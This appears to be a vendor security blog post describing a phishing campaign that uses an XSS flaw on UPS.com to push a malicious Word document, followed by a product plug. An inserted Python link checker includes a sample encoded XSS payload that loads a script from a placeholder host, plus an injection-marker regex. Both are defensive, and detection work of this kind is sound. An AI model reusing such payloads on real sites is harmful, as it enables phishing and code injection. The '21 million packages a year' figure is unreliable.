Phishing campaign utilizes UPS website vulnerability

A brand-new phishing campaign sees attackers sending out emails disguised as official UPS communications. These messages utilize an XSS vulnerability on UPS.com to appear remarkably legitimate.

UPS delivers more than 21 million packages a year and has over 26 percent of the parcel service market share, making this campaign an effective way to target inboxes.

Every link in the phishing emails is legitimate except the one for the tracking number. When clicked, that link takes victims to the UPS website, where a malicious JavaScript injection causes the page to display an innocuous-looking message informing users that a file will be downloaded. This file is actually a malicious Word document that ultimately delivers an additional payload.
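Because the malicious link points at the genuine site, domain reputation alone will not catch it. The following Python check is an added example, not code from the original article or from any vendor product: it decodes every link that targets an allow-listed domain and flags those carrying script or markup. The domain `parcel.example`, the parameter names, the marker list and the sample message are constructed assumptions, since the article does not give the real URL format.

```python
import re
from html import unescape
from urllib.parse import urlsplit, unquote_plus

# Hypothetical allow-list: domains a mail filter would otherwise treat as safe.
TRUSTED_DOMAINS = {"parcel.example"}
# Markers that have no place in a tracking-number style link (assumed, not exhaustive).
INJECTION_RE = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed)\b"
    r"|\bon(error|load|click|focus|mouseover)\s*=|javascript\s*:", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

def fully_decode(value, max_rounds=5):
    """Undo nested URL and HTML-entity encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value

def is_trusted(host):
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)

def suspicious_trusted_links(email_body):
    """Return links that point at a trusted host yet carry injected markup."""
    hits = []
    for url in URL_RE.findall(email_body):
        try:
            parts = urlsplit(url)
        except ValueError:  # malformed URL, e.g. broken IPv6 brackets
            continue
        if not is_trusted(parts.hostname):
            continue
        payload = fully_decode(" ".join((parts.path, parts.query, parts.fragment)))
        if INJECTION_RE.search(payload):
            hits.append(url)
    return hits

# Constructed sample message; host, paths and parameter names are made up.
SAMPLE_EMAIL = """Your package is on its way.
Track it: https://www.parcel.example/track?loc=en_US&num=1Z999%2522%253E%253Cscript%2520src%253D%252F%252Fcdn.invalid%252Fa.js%253E
Help: https://www.parcel.example/help?topic=delivery
"""
```

The sample tracking link is double URL-encoded, which is why the check decodes repeatedly before matching; a single decoding pass would leave the markup hidden.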

Attacks like this demonstrate how crafty attackers can be, and how tricky it can be to determine whether a file or message is truly safe. Acronis' Advanced Email Security pack brings cyber protection to email inboxes, using advanced heuristics to filter out messages with malicious links and attachments before they can ever be opened.